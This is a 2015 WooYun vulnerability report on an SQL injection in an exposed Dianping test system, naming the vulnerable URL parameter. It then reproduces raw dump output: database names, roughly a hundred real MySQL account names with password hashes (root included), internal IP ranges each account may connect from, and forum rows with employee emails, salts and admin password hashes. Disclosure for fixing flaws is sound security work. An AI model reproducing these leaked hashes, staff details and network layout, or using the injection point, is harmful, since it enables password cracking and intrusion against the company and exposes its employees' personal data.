当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090759

漏洞标题:大众点评重要测试系统暴露导致高危注入

相关厂商:大众点评

漏洞作者: if、so

提交时间:2015-01-09 11:17

修复时间:2015-02-23 11:18

公开时间:2015-02-23 11:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-09: 细节已通知厂商并且等待厂商处理中
2015-01-09: 厂商已经确认,细节仅向厂商公开
2015-01-19: 细节向核心白帽子及相关领域专家公开
2015-01-29: 细节向普通白帽子公开
2015-02-08: 细节向实习白帽子公开
2015-02-23: 细节向公众公开

简要描述:

大众点评重要测试系统暴露导致高危注入,海量数据库

详细说明:

1111.JPG


如图,很重要的系统,让我想到了支付宝的那个可以更新余额的系统
查询处存在注入,mobileno
http://ceshi.51ping.com/getUserInfo?usernickname=iamp912&mobileno=xxxxx
海量数据,由于是mysql errorbased注入,数据简直和水一样来。。
databases

available databases [58]:
[*] BAFSExpense
[*] BAFSWorkflow
[*] BAMenu
[*] Bonus
[*] CasServer
[*] DianPing
[*] DianPingAC
[*] DianPingAPI
[*] DianpingBA_FSAccounting
[*] DianpingBA_FSReport
[*] DianPingCOMM
[*] DianPingHR_CRM
[*] DianPingUC
[*] DPBAFCR
[*] DPBeauty
[*] DPEmployeeMD
[*] DPK2Server
[*] DPK2Server​
[*] DPMasterData
[*] DPMobile
[*] DPReview
[*] DPSaleForce
[*] DPSearch
[*] DPSearchOperation
[*] DPShop
[*] DWAnalytic
[*] Forum
[*] HRService
[*] ImageFlow
[*] information_schema
[*] mysql
[*] MySQLDianPingGroup_dbo
[*] nagios
[*] Overseas
[*] PartnerPlatform
[*] performance_schema
[*] Promotion
[*] rabbit
[*] RTXUM
[*] SearchKV
[*] SearchPortal
[*] slb
[*] test
[*] TopList
[*] WeChat
[*] WeiXinAdapter
[*] WeLife
[*] WeLife0
[*] WeLife1
[*] WeLife2
[*] WeLife3
[*] WeLife4
[*] WeLife5
[*] WeLife6
[*] WeLife7
[*] WeLife8
[*] WeLife9
[*] WeSMS


mysql用户账号密码!!

[*] analytic [1]:
password hash: *19F001D9020254DEA5EACFCDD2022ADE193394B5
[*] analytic_r [1]:
password hash: *C28ECAF8E981E366EC1A37DD6AEA7CE79C684E77
[*] aspnet_API [1]:
password hash: *790FEA0132128BE3070E74B5330C9AD1BF8121AF
[*] aspnet_dianping [1]:
password hash: *5FFFB09B61D2A8F8924E019E7550FA1B4A0C3D86
[*] aspnet_group [1]:
password hash: *B7D11B2BDF597962BA620DCD0D55A6E5BE225420
[*] aspnet_sys [1]:
password hash: *9B41AC44C067B1B617D2FC72A081C7309386DFDD
[*] aspnet_user [1]:
password hash: *B3EDC39CBDDA26F7C6219F6E7A578D070611A1E5
[*] bamenu [1]:
password hash: *8D3259BD11AFB87AB32C640A3D9D316114043AF8
[*] bamenu_r [1]:
password hash: *8336632E2C4CE140134CBC33F3B239E7833B948C
[*] beauty [1]:
password hash: *500CF9BB27B49CC223334416F0FAE2B66346D7D7
[*] beauty_r [1]:
password hash: *0326C36F2C7D7E7CD1834F5925821728B9F58A6A
[*] binlog [1]:
password hash: *A00D14A4D8D5C04C7D7E4162A8FB517F57064F4B
[*] bonus [1]:
password hash: *5CF99EF368F08CB86420B5494EF5CA3D379F3FB0
[*] bonus_r [1]:
password hash: *FA1A5E56B83D235AD1A9610FC3C921AB507D11CB
[*] CMAdmin [1]:
password hash: *3A7A54425366153C359C02C85EFC29C1A8F70245
[*] dbi_user [1]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*] dianping.qa [1]:
password hash: *D853AEE39708F2CB3DF360D973304C62F3E62BDB
[*] dong.wang [1]:
password hash: *64752846C5213656986A833F527A8409A7F25E0A
[*] dp_monitor [1]:
password hash: *4A7FEF7A1B34A8AADD5EDD5454B41F9EA451C182
[*] dpbackup [1]:
password hash: *FBE48E4441193F1B6035D1CECF1841C35F15B0C8
[*] dpbase_auth [2]:
password hash: *9CF1DA5DA163B1CAE7814B68FC51803FF682E02F
password hash: *E0C488F41D8F50592D4F400F687EE615EE96C506
[*] dpclose [1]:
password hash: *42ED5F36FD65842FC1F4EC2387F87ACF8AE526B8
[*] dpcom_adpt [1]:
password hash: *C9524B95C46089CC7980C8142521654AE5F379BC
[*] dpcom_adpt_r [1]:
password hash: *CC8C02A4AA5405A2C8D67FDFEB07EEF4E121C27C
[*] dpcom_cas [1]:
password hash: *E2376662BD94B63BD041DB5D1A655FC4EBFEB608
[*] dpcom_cas_r [1]:
password hash: *16B4680430355726949D5EDF911AEE27FD1638E7
[*] dpcom_crm [1]:
password hash: *414E8D46E0405883575EE6C9C3F714FD9F4BB7FB
[*] dpcom_crm_r [1]:
password hash: *F1731C9D30443DB49E14177F577DCD0870683895
[*] dpcom_dp_r [1]:
password hash: *A0C88EA217F19E8E3ECBBC1725C8E18683DDE583
[*] dpcom_emd [1]:
password hash: *F77FF0183A6D9346832B3FB91332F0594C946EE8
[*] dpcom_emd_r [1]:
password hash: *9403B0F7C41FC75906E501BDB75FA914593769E1
[*] dpcom_fcr [1]:
password hash: *AD791CD94AAEAC714D0AC32B9C123ECEB5AB5F27
[*] dpcom_fcr_r [1]:
password hash: *1154B72078E3C67FCDCE677001D6E18EB679C527
[*] dpcom_job_r [2]:
password hash: *59052B289E65D24267815A289B96534C03A46CF2
password hash: *F3E8AA45E29DE3CFAE8DF92BDB0B02F1B9F7F60B
[*] dpcom_operation [1]:
password hash: *2E9A1BB28DA3D2BE39F9B606F2C2C49576006B14
[*] dpcom_rtxum [1]:
password hash: *339A8801BDF3F416D65CC7441C4BD546619963D0
[*] dpcom_rtxum_r [1]:
password hash: *ACFB58541E33027EDB6E1D313F793BB7F3A77D37
[*] dpcom_sys_r [1]:
password hash: *1489082D3627BEAE116CB1D54CB0DFE0AED1D58C
[*] dpcomm [1]:
password hash: *07FF8600CAAF55278FD5C3099579C1FB6FB30278
[*] DPK2Server [1]:
password hash: *5EF500FE6394B046167A52D0DBCC557E02DE99FC
[*] DPK2Server_r [1]:
password hash: *9181F1A0327C00BC5B433A85C17CEF75A7E0323D
[*] dpk2server​ [1]:
password hash: *4CFEF1A8E5B2DCB44A38D0C285F5CA88BC0C8650
[*] dpk2server​_r [1]:
password hash: *3734FE9EB8CE95400D9EAAA56B57C0C3DE88DE66
[*] dploader [1]:
password hash: *453182DE93C618F5BD689D7D48C7385C6F2414E8
[*] dpmasterdata [1]:
password hash: *13C8DEE9EFCDA24667807ED738AEA1146002EF1B
[*] dpmasterdata_r [1]:
password hash: *AC7E177B2380E7ED47D8101ECF011E8DA56040E1
[*] dpmobile [1]:
password hash: *C7A1D18C5F17D2378DDCFF421693B402E6C008E6
[*] dpmobile_r [1]:
password hash: *6C66D81D6973EFCE44F26D5D72DEC86C24DD28FE
[*] dpreview [1]:
password hash: *09B8D61F2D70C1445BA8DBFA675A3D7B01A3409D
[*] dpreview_r [1]:
password hash: *35A276CDD99F6626CC74C1F30E43E32893AA4FCB
[*] dpsf [1]:
password hash: *2FDD1799DCD93B4082FD6DF2730D896C1D05710C
[*] dpsf_r [1]:
password hash: *6177E8E17AE2C453CFD9D8694393F0509801CBF1
[*] dpshop [1]:
password hash: *298A7BBEDCA34EDF472FD58E9B93C19454ACB757
[*] dpshop_a [1]:
password hash: *37C61A9B440E2E78F9F27ACC87E123004411AFBF
[*] dpshop_a_r [1]:
password hash: *544ACB66CBAD2C1469449DC8AF6B61354EC0268F
[*] dpshop_r [1]:
password hash: *B93BD9DF88D7C804FA41A285EBFF0E0B56FD7BDE
[*] faping.miao [1]:
password hash: *3913DD89BF42283BF000F11B0E5A8B1B8AE68FA7
[*] form [1]:
password hash: *1E88E9B3FA5AA97A70EFF96B90940DBCC3E1F28D
[*] form_r [1]:
password hash: *E21A0AF714880AE287B353D73F786FB190DD427C
[*] forum [1]:
password hash: *9546EDB5DF22CC8F33D04BAC61B9313751847668
[*] forum_r [1]:
password hash: *C458678B137528B3C2687E5BED12065E9F3CEA9D
[*] freshdp [1]:
password hash: *9519BD5A612419AECFB29EE00BD4E1B0B6D74424
[*] FSAccounting [1]:
password hash: *ABB761EF4BB7047F4A4451E91C7A640CA77B91D3
[*] FSAccounting_r [1]:
password hash: *9BBAB3E42477A59AEF6BC022F1B9FDF1131AEF63
[*] fsexpense [1]:
password hash: *B791B0267A8BC1C6607208BFA2A822EBA1845B5E
[*] fsexpense_r [1]:
password hash: *F84C8D615B5E7E810815B35F7473358ECE199F4A
[*] FSReport [1]:
password hash: *EFAE7035DDCFBF44E9E385E657C9240AB1D00D9E
[*] FSReport_r [1]:
password hash: *6BCEF93045C6A52F2135243D3F882433E79CBF2B
[*] fsworkflow [1]:
password hash: *A2DFF8A8C0ECB73063BC5239E84424FC1F30E56F
[*] fsworkflow_r [1]:
password hash: *825E5B4746CF963F11C5B20B5A19E85DFD58517C
[*] gpadmin [1]:
password hash: *47F0B7B2083B2BB6347E25387C51B951EEF355E3
[*] haproxy [1]:
password hash: NULL
[*] hong.wang [1]:
password hash: *5CBE2BEB0F290EB5D19240BCFA49BC7E488D25A0
[*] hrservice [1]:
password hash: *918FDEB7056D3E4E87C0DD9CD80D34C0A873A519
[*] hrservice_r [1]:
password hash: *9A1EA196882B3B2F2D0E802C93AB7CEB1A57577B
[*] imageflow [1]:
password hash: *9C393F2524F5F4306C0F8B0C1462A609EA6BC8CB
[*] imageflow_r [1]:
password hash: *B88C16266E1D813F7B2C432392737A4EDA0709FA
[*] jin.huang [1]:
password hash: *A315229698E611766B51B9F5D3D6C7BEB3FAA453
[*] junyi.lu [1]:
password hash: *45B413A11F267A6D88FABA3859BF62CDA1FBBC48
[*] mail_mirror [1]:
password hash: *85965862612CD0F58295357238E0497A9AC5ADE8
[*] mmm_agent [1]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*] mmm_monitor [1]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*] motion [1]:
password hash: *BA86AC67550BF303544686467BF2D0F202AA1017
[*] motion_r [1]:
password hash: *3DE4C5200193507FA6D0BA4C88C82507C8B9FD7D
[*] myadmin [3]:
password hash: *3913DD89BF42283BF000F11B0E5A8B1B8AE68FA7
password hash: *62ED160211E19F9A5CADFD825DA37543DD2BE685
password hash: *7E0D638B6AE17257BBFA54E2CC21A456ACA7728E
[*] overseas [1]:
password hash: *B2C911E542414B29E3E8A75D5461EA7AFC084E13
[*] overseas_r [1]:
password hash: *9B384DD404F6C80357FE290FD09193F3AF29AA54
[*] qunying.liu [1]:
password hash: *0101D51B80C9CD34BB8FB2CD989B593A98CFE0F7
[*] repl [1]:
password hash: *A424E797037BF97C19A2E88CF7891C5C2038C039
[*] root [1]:
password hash: *714468107AEBF86EFCEFCAB5C926C98A62F6330D
[*] ryan.yu [1]:
password hash: *35FE1E375F7930F2ECCB86D92B35E364DE564360
[*] SearchKV [1]:
password hash: *E992FFA323AC0381F1899C87F0BE062E6CDBEF10
[*] searchportal [1]:
password hash: *69359FB1600495BC3AEA3F1B6296E8C9B6C827E7
[*] searchportal_r [1]:
password hash: *10435EFC825CBC251267D12BCA46E0BCE962C139
[*] slb [1]:
password hash: *66D08FCE4E10FD3546F1E42951986930D07783BC
[*] slb_r [1]:
password hash: *CB5453876F1BB23CA492E69FABEDE87039787D35
[*] tempuser_L1U0 [1]:
password hash: NULL
[*] tempuser_L2U0 [1]:
password hash: NULL
[*] tempuser_L3U0 [1]:
password hash: NULL
[*] tempuser_L3U1 [1]:
password hash: NULL
[*] toplist [1]:
password hash: *73EF5C496F8AF09E1D174541A1155F2434035BB6
[*] toplist_r [1]:
password hash: *F0955BBF5D5B5CFC0A350EDF760810DFA387F45C
[*] wechat [1]:
password hash: *E52C80E8F7CE26E9C8E1EE642A52117635F6E2CD
[*] wechat_r [1]:
password hash: *499F4FEF0FD5AF03FBA354301DEACAFD095D2C73
[*] welife [1]:
password hash: *6701BC80A45A5301A4B909EB066A63BC990D1170
[*] welife_r [1]:
password hash: *A811AE4EAA8037C0A01794EEAF28D565BF218082
[*] wesms [1]:
password hash: *EFABFFEC769A3B9F7722B869CEE91A520922F0B6
[*] wesms_r [1]:
password hash: *E2AFCA11A06B04994923DE784640D0FD6F1208EA
[*] zhiyuan.li [1]:
password hash: *6D6273671B77E34ACDE9B0872CE240C042892EE3


[*] 'analytic'@'10.1.%'
[*] 'analytic'@'10.101.%'
[*] 'analytic'@'10.128.%'
[*] 'analytic'@'10.2.%'
[*] 'analytic'@'192.168.%'
[*] 'analytic_r'@'10.1.%'
[*] 'analytic_r'@'10.101.%'
[*] 'analytic_r'@'10.128.%'
[*] 'analytic_r'@'10.2.%'
[*] 'analytic_r'@'192.168.%'
[*] 'aspnet_API'@'10.1.%'
[*] 'aspnet_API'@'10.128.%.%'
[*] 'aspnet_API'@'192.168.%'
[*] 'aspnet_dianping'@'10.1.%'
[*] 'aspnet_dianping'@'10.128.%'
[*] 'aspnet_dianping'@'10.254.25%'
[*] 'aspnet_dianping'@'192.168.%'
[*] 'aspnet_group'@'10.1.%'
[*] 'aspnet_group'@'10.128.%.%'
[*] 'aspnet_group'@'192.168.%'
[*] 'aspnet_sys'@'10.1.%'
[*] 'aspnet_sys'@'10.128.%.%'
[*] 'aspnet_sys'@'192.168.%'
[*] 'aspnet_user'@'10.1.%'
[*] 'aspnet_user'@'10.128.%.%'
[*] 'aspnet_user'@'192.168.%'
[*] 'bamenu'@'10.1.%'
[*] 'bamenu'@'10.101.%'
[*] 'bamenu'@'10.128.%'
[*] 'bamenu'@'10.2.%'
[*] 'bamenu'@'192.168.%'
[*] 'bamenu_r'@'10.1.%'
[*] 'bamenu_r'@'10.101.%'
[*] 'bamenu_r'@'10.128.%'
[*] 'bamenu_r'@'10.2.%'
[*] 'bamenu_r'@'192.168.%'
[*] 'beauty'@'10.1.%'
[*] 'beauty'@'10.101.%'
[*] 'beauty'@'10.128.%'
[*] 'beauty'@'10.2.%'
[*] 'beauty'@'192.168.%'
[*] 'beauty_r'@'10.1.%'
[*] 'beauty_r'@'10.101.%'
[*] 'beauty_r'@'10.128.%'
[*] 'beauty_r'@'10.2.%'
[*] 'beauty_r'@'192.168.%'
[*] 'binlog'@'10.1.%'
[*] 'binlog'@'10.128.%.%'
[*] 'binlog'@'192.168.%'
[*] 'bonus'@'10.1.%'
[*] 'bonus'@'10.101.%'
[*] 'bonus'@'10.128.%'
[*] 'bonus'@'10.2.%'
[*] 'bonus'@'192.168.%'
[*] 'bonus_r'@'10.1.%'
[*] 'bonus_r'@'10.101.%'
[*] 'bonus_r'@'10.128.%'
[*] 'bonus_r'@'10.2.%'
[*] 'bonus_r'@'192.168.%'
[*] 'CMAdmin'@'10.128.%.%'
[*] 'CMAdmin'@'192.168.%'
[*] 'dbi_user'@'10.128.%.%'
[*] 'dbi_user'@'192.168.%'
[*] 'dianping.qa'@'10.1.77.%'
[*] 'dianping.qa'@'10.128.%'
[*] 'dianping.qa'@'192.168.%'
[*] 'dong.wang'@'10.1.1.62'
[*] 'dp_monitor'@'10.1.1.111'
[*] 'dp_monitor'@'localhost'
[*] 'dpbackup'@'localhost'
[*] 'dpbase_auth'@'10.1.2.119'
[*] 'dpbase_auth'@'10.1.2.139'
[*] 'dpbase_auth'@'10.1.77.211'
[*] 'dpclose'@'localhost'
[*] 'dpcom_adpt'@'10.1.%'
[*] 'dpcom_adpt'@'10.101.%'
[*] 'dpcom_adpt'@'10.128.%'
[*] 'dpcom_adpt'@'10.2.%'
[*] 'dpcom_adpt'@'192.168.%'
[*] 'dpcom_adpt_r'@'10.1.%'
[*] 'dpcom_adpt_r'@'10.101.%'
[*] 'dpcom_adpt_r'@'10.128.%'
[*] 'dpcom_adpt_r'@'10.2.%'
[*] 'dpcom_adpt_r'@'192.168.%'
[*] 'dpcom_cas'@'10.1.%'
[*] 'dpcom_cas'@'10.128.%'
[*] 'dpcom_cas'@'192.168.%'
[*] 'dpcom_cas_r'@'10.1.%'
[*] 'dpcom_cas_r'@'10.128.%'
[*] 'dpcom_cas_r'@'192.168.%'
[*] 'dpcom_crm'@'10.1.%'
[*] 'dpcom_crm'@'10.101.%'
[*] 'dpcom_crm'@'10.128.%'
[*] 'dpcom_crm'@'10.2.%'
[*] 'dpcom_crm'@'192.168.%'
[*] 'dpcom_crm_r'@'10.1.%'
[*] 'dpcom_crm_r'@'10.101.%'
[*] 'dpcom_crm_r'@'10.128.%'
[*] 'dpcom_crm_r'@'10.2.%'
[*] 'dpcom_crm_r'@'192.168.%'
[*] 'dpcom_dp_r'@'10.128.%.%'
[*] 'dpcom_dp_r'@'192.168.%'
[*] 'dpcom_emd'@'10.1.%'
[*] 'dpcom_emd'@'10.101.%'
[*] 'dpcom_emd'@'10.128.%'
[*] 'dpcom_emd'@'10.2.%'
[*] 'dpcom_emd'@'192.168.%'
[*] 'dpcom_emd_r'@'10.1.%'
[*] 'dpcom_emd_r'@'10.101.%'
[*] 'dpcom_emd_r'@'10.128.%'
[*] 'dpcom_emd_r'@'10.2.%'
[*] 'dpcom_emd_r'@'192.168.%'
[*] 'dpcom_fcr'@'10.1.%'
[*] 'dpcom_fcr'@'10.128.%'
[*] 'dpcom_fcr'@'192.168.%'
[*] 'dpcom_fcr_r'@'10.1.%'
[*] 'dpcom_fcr_r'@'10.128.%'
[*] 'dpcom_fcr_r'@'192.168.%'
[*] 'dpcom_job_r'@'10.1.%'
[*] 'dpcom_job_r'@'10.128.%.%'
[*] 'dpcom_job_r'@'192.168.%'
[*] 'dpcom_operation'@'10.1.%'
[*] 'dpcom_operation'@'10.101.%'
[*] 'dpcom_operation'@'10.128.%'
[*] 'dpcom_operation'@'10.2.%'
[*] 'dpcom_operation'@'192.168.%'
[*] 'dpcom_rtxum'@'10.1.%'
[*] 'dpcom_rtxum'@'10.128.%'
[*] 'dpcom_rtxum'@'192.168.%'
[*] 'dpcom_rtxum_r'@'10.1.%'
[*] 'dpcom_rtxum_r'@'10.128.%'
[*] 'dpcom_rtxum_r'@'192.168.%'
[*] 'dpcom_sys_r'@'192.168.%'
[*] 'dpcomm'@'10.1.%'
[*] 'dpcomm'@'10.128.%'
[*] 'DPK2Server'@'10.1.%'
[*] 'DPK2Server'@'10.101.%'
[*] 'DPK2Server'@'10.128.%'
[*] 'DPK2Server'@'10.2.%'
[*] 'DPK2Server'@'192.168.%'
[*] 'DPK2Server_r'@'10.1.%'
[*] 'DPK2Server_r'@'10.101.%'
[*] 'DPK2Server_r'@'10.128.%'
[*] 'DPK2Server_r'@'10.2.%'
[*] 'DPK2Server_r'@'192.168.%'
[*] 'dpk2server​'@'10.1.%'
[*] 'dpk2server​'@'10.101.%'
[*] 'dpk2server​'@'10.128.%'
[*] 'dpk2server​'@'10.2.%'
[*] 'dpk2server​'@'192.168.%'
[*] 'dpk2server​_r'@'10.1.%'
[*] 'dpk2server​_r'@'10.101.%'
[*] 'dpk2server​_r'@'10.128.%'
[*] 'dpk2server​_r'@'10.2.%'
[*] 'dpk2server​_r'@'192.168.%'
[*] 'dploader'@'localhost'
[*] 'dpmasterdata'@'10.1.%'
[*] 'dpmasterdata'@'10.101.%'
[*] 'dpmasterdata'@'10.128.%'
[*] 'dpmasterdata'@'10.2.%'
[*] 'dpmasterdata'@'192.168.%'
[*] 'dpmasterdata_r'@'10.1.%'
[*] 'dpmasterdata_r'@'10.101.%'
[*] 'dpmasterdata_r'@'10.128.%'
[*] 'dpmasterdata_r'@'10.2.%'
[*] 'dpmasterdata_r'@'192.168.%'
[*] 'dpmobile'@'10.1.%'
[*] 'dpmobile'@'10.128.%'
[*] 'dpmobile'@'192.168.%'
[*] 'dpmobile_r'@'10.1.%'
[*] 'dpmobile_r'@'10.128.%'
[*] 'dpmobile_r'@'192.168.%'
[*] 'dpreview'@'10.1.%'
[*] 'dpreview'@'10.101.%'
[*] 'dpreview'@'10.128.%'
[*] 'dpreview'@'10.2.%'
[*] 'dpreview'@'192.168.%'
[*] 'dpreview_r'@'10.1.%'
[*] 'dpreview_r'@'10.101.%'
[*] 'dpreview_r'@'10.128.%'
[*] 'dpreview_r'@'10.2.%'
[*] 'dpreview_r'@'192.168.%'
[*] 'dpsf'@'10.1.%'
[*] 'dpsf'@'10.101.%'
[*] 'dpsf'@'10.128.%'
[*] 'dpsf'@'10.2.%'
[*] 'dpsf'@'192.168.%'
[*] 'dpsf_r'@'10.1.%'
[*] 'dpsf_r'@'10.101.%'
[*] 'dpsf_r'@'10.128.%'
[*] 'dpsf_r'@'10.2.%'
[*] 'dpsf_r'@'192.168.%'
[*] 'dpshop'@'10.1.%'
[*] 'dpshop'@'10.101.%'
[*] 'dpshop'@'10.128.%'
[*] 'dpshop'@'10.2.%'
[*] 'dpshop'@'192.168.%'
[*] 'dpshop_a'@'10.1.%'
[*] 'dpshop_a'@'10.101.%'
[*] 'dpshop_a'@'10.128.%'
[*] 'dpshop_a'@'10.2.%'
[*] 'dpshop_a'@'192.168.%'
[*] 'dpshop_a_r'@'10.1.%'
[*] 'dpshop_a_r'@'10.101.%'
[*] 'dpshop_a_r'@'10.128.%'
[*] 'dpshop_a_r'@'10.2.%'
[*] 'dpshop_a_r'@'192.168.%'
[*] 'dpshop_r'@'10.1.%'
[*] 'dpshop_r'@'10.101.%'
[*] 'dpshop_r'@'10.128.%'
[*] 'dpshop_r'@'10.2.%'
[*] 'dpshop_r'@'192.168.%'
[*] 'faping.miao'@'10.1.1.62'
[*] 'form'@'10.1.%'
[*] 'form'@'10.128.%'
[*] 'form'@'10.254.251.%'
[*] 'form'@'192.168.%'
[*] 'form_r'@'10.1.%'
[*] 'form_r'@'10.128.%'
[*] 'form_r'@'192.168.%'
[*] 'forum'@'10.1.%'
[*] 'forum'@'10.101.%'
[*] 'forum'@'10.128.%'
[*] 'forum'@'10.2.%'
[*] 'forum'@'192.168.%'
[*] 'forum_r'@'10.1.%'
[*] 'forum_r'@'10.101.%'
[*] 'forum_r'@'10.128.%'
[*] 'forum_r'@'10.2.%'
[*] 'forum_r'@'192.168.%'
[*] 'freshdp'@'10.128.%.%'
[*] 'freshdp'@'192.168.%'
[*] 'FSAccounting'@'10.1.%'
[*] 'FSAccounting'@'10.101.%'
[*] 'FSAccounting'@'10.128.%'
[*] 'FSAccounting'@'10.2.%'
[*] 'FSAccounting'@'192.168.%'
[*] 'FSAccounting_r'@'10.1.%'
[*] 'FSAccounting_r'@'10.101.%'
[*] 'FSAccounting_r'@'10.128.%'
[*] 'FSAccounting_r'@'10.2.%'
[*] 'FSAccounting_r'@'192.168.%'
[*] 'fsexpense'@'10.1.%'
[*] 'fsexpense'@'10.101.%'
[*] 'fsexpense'@'10.128.%'
[*] 'fsexpense'@'10.2.%'
[*] 'fsexpense'@'192.168.%'
[*] 'fsexpense_r'@'10.1.%'
[*] 'fsexpense_r'@'10.101.%'
[*] 'fsexpense_r'@'10.128.%'
[*] 'fsexpense_r'@'10.2.%'
[*] 'fsexpense_r'@'192.168.%'
[*] 'FSReport'@'10.1.%'
[*] 'FSReport'@'10.101.%'
[*] 'FSReport'@'10.128.%'
[*] 'FSReport'@'10.2.%'
[*] 'FSReport'@'192.168.%'
[*] 'FSReport_r'@'10.1.%'
[*] 'FSReport_r'@'10.101.%'
[*] 'FSReport_r'@'10.128.%'
[*] 'FSReport_r'@'10.2.%'
[*] 'FSReport_r'@'192.168.%'
[*] 'fsworkflow'@'10.1.%'
[*] 'fsworkflow'@'10.101.%'
[*] 'fsworkflow'@'10.128.%'
[*] 'fsworkflow'@'10.2.%'
[*] 'fsworkflow'@'192.168.%'
[*] 'fsworkflow_r'@'10.1.%'
[*] 'fsworkflow_r'@'10.101.%'
[*] 'fsworkflow_r'@'10.128.%'
[*] 'fsworkflow_r'@'10.2.%'
[*] 'fsworkflow_r'@'192.168.%'
[*] 'gpadmin'@'10.1.1.239'
[*] 'haproxy'@'192.168.%'
[*] 'hong.wang'@'10.128.%.%'
[*] 'hong.wang'@'192.168.%'
[*] 'hrservice'@'10.1.%'
[*] 'hrservice'@'10.101.%'
[*] 'hrservice'@'10.128.%'
[*] 'hrservice'@'10.2.%'
[*] 'hrservice'@'192.168.%'
[*] 'hrservice_r'@'10.1.%'
[*] 'hrservice_r'@'10.101.%'
[*] 'hrservice_r'@'10.128.%'
[*] 'hrservice_r'@'10.2.%'
[*] 'hrservice_r'@'192.168.%'
[*] 'imageflow'@'10.1.%'
[*] 'imageflow'@'10.101.%'
[*] 'imageflow'@'10.128.%'
[*] 'imageflow'@'10.2.%'
[*] 'imageflow'@'192.168.%'
[*] 'imageflow_r'@'10.1.%'
[*] 'imageflow_r'@'10.101.%'
[*] 'imageflow_r'@'10.128.%'
[*] 'imageflow_r'@'10.2.%'
[*] 'imageflow_r'@'192.168.%'
[*] 'jin.huang'@'10.128.%.%'
[*] 'jin.huang'@'192.168.%'
[*] 'junyi.lu'@'10.1.1.%'
[*] 'mail_mirror'@'10.1.%'
[*] 'mmm_agent'@'10.1.77.%'
[*] 'mmm_monitor'@'10.1.77.%'
[*] 'motion'@'10.1.%'
[*] 'motion'@'10.101.%'
[*] 'motion'@'10.128.%'
[*] 'motion'@'10.2.%'
[*] 'motion'@'192.168.%'
[*] 'motion_r'@'10.1.%'
[*] 'motion_r'@'10.101.%'
[*] 'motion_r'@'10.128.%'
[*] 'motion_r'@'10.2.%'
[*] 'motion_r'@'192.168.%'
[*] 'myadmin'@'10.1.%'
[*] 'myadmin'@'10.1.1.186'
[*] 'myadmin'@'10.1.1.231'
[*] 'myadmin'@'10.1.1.62'
[*] 'myadmin'@'192.168.%'
[*] 'myadmin'@'localhost'
[*] 'overseas'@'10.1.%'
[*] 'overseas'@'10.101.%'
[*] 'overseas'@'10.128.%'
[*] 'overseas'@'10.2.%'
[*] 'overseas'@'192.168.%'
[*] 'overseas_r'@'10.1.%'
[*] 'overseas_r'@'10.101.%'
[*] 'overseas_r'@'10.128.%'
[*] 'overseas_r'@'10.2.%'
[*] 'overseas_r'@'192.168.%'
[*] 'qunying.liu'@'10.1.%'
[*] 'repl'@'10.1.77.%'
[*] 'root'@'localhost'
[*] 'ryan.yu'@'10.128.%.%'
[*] 'ryan.yu'@'10.254.25%'
[*] 'ryan.yu'@'192.168.%'
[*] 'SearchKV'@'10.128.%.%'
[*] 'SearchKV'@'192.168.%'
[*] 'searchportal'@'10.1.%'
[*] 'searchportal'@'10.128.%'
[*] 'searchportal'@'192.168.%'
[*] 'searchportal_r'@'10.1.%'
[*] 'searchportal_r'@'10.128.%'
[*] 'searchportal_r'@'192.168.%'
[*] 'slb'@'10.1.%'
[*] 'slb'@'10.101.%'
[*] 'slb'@'10.128.%'
[*] 'slb'@'10.2.%'
[*] 'slb'@'192.168.%'
[*] 'slb_r'@'10.1.%'
[*] 'slb_r'@'10.101.%'
[*] 'slb_r'@'10.128.%'
[*] 'slb_r'@'10.2.%'
[*] 'slb_r'@'192.168.%'
[*] 'tempuser_L1U0'@'10.254.25%'
[*] 'tempuser_L1U0'@'192.168.%'
[*] 'tempuser_L2U0'@'10.254.25%'
[*] 'tempuser_L2U0'@'192.168.%'
[*] 'tempuser_L3U0'@'10.254.25%'
[*] 'tempuser_L3U0'@'192.168.%'
[*] 'tempuser_L3U1'@'10.254.25%'
[*] 'tempuser_L3U1'@'192.168.%'
[*] 'toplist'@'10.1.%'
[*] 'toplist'@'10.101.%'
[*] 'toplist'@'10.128.%'
[*] 'toplist'@'10.2.%'
[*] 'toplist'@'192.168.%'
[*] 'toplist_r'@'10.1.%'
[*] 'toplist_r'@'10.101.%'
[*] 'toplist_r'@'10.128.%'
[*] 'toplist_r'@'10.2.%'
[*] 'toplist_r'@'192.168.%'
[*] 'wechat'@'10.1.%'
[*] 'wechat'@'10.101.%'
[*] 'wechat'@'10.128.%'
[*] 'wechat'@'10.2.%'
[*] 'wechat'@'192.168.%'
[*] 'wechat_r'@'10.1.%'
[*] 'wechat_r'@'10.101.%'
[*] 'wechat_r'@'10.128.%'
[*] 'wechat_r'@'10.2.%'
[*] 'wechat_r'@'192.168.%'
[*] 'welife'@'10.1.%'
[*] 'welife'@'10.101.%'
[*] 'welife'@'10.128.%'
[*] 'welife'@'10.2.%'
[*] 'welife'@'192.168.%'
[*] 'welife_r'@'10.1.%'
[*] 'welife_r'@'10.101.%'
[*] 'welife_r'@'10.128.%'
[*] 'welife_r'@'10.2.%'
[*] 'welife_r'@'192.168.%'
[*] 'wesms'@'10.1.%'
[*] 'wesms'@'10.101.%'
[*] 'wesms'@'10.128.%'
[*] 'wesms'@'10.2.%'
[*] 'wesms'@'192.168.%'
[*] 'wesms_r'@'10.1.%'
[*] 'wesms_r'@'10.101.%'
[*] 'wesms_r'@'10.128.%'
[*] 'wesms_r'@'10.2.%'
[*] 'wesms_r'@'192.168.%'
[*] 'zhiyuan.li'@'10.1.%'
[*] 'zhiyuan.li'@'10.128.%.%'
[*] 'zhiyuan.li'@'192.168.%'


这些数据可能导致整个业务线数据泄露
库太多了,不好分辨,随便找了一个试试
看到forum库,尝试找dz论坛,找了好久,终于找到
bbs.51ping.com/bbs

uid,myid,myidkey,salt,regip,email,secques,regdate,username,password,lastloginip,lastlogintime
1,<blank>,<blank>,99afcf,hidden,es.ba@dianping.com,<blank>,1419326409,admin,96056643fb8657d1d73f2e7b0a9c79e1,0,0
12,<blank>,<blank>,59ef42,192.168.224.166,zhijun.ding@dianping.com,<blank>,1419498405,zhijun.ding,1da428a557230e065eee7e063611a595,0,0
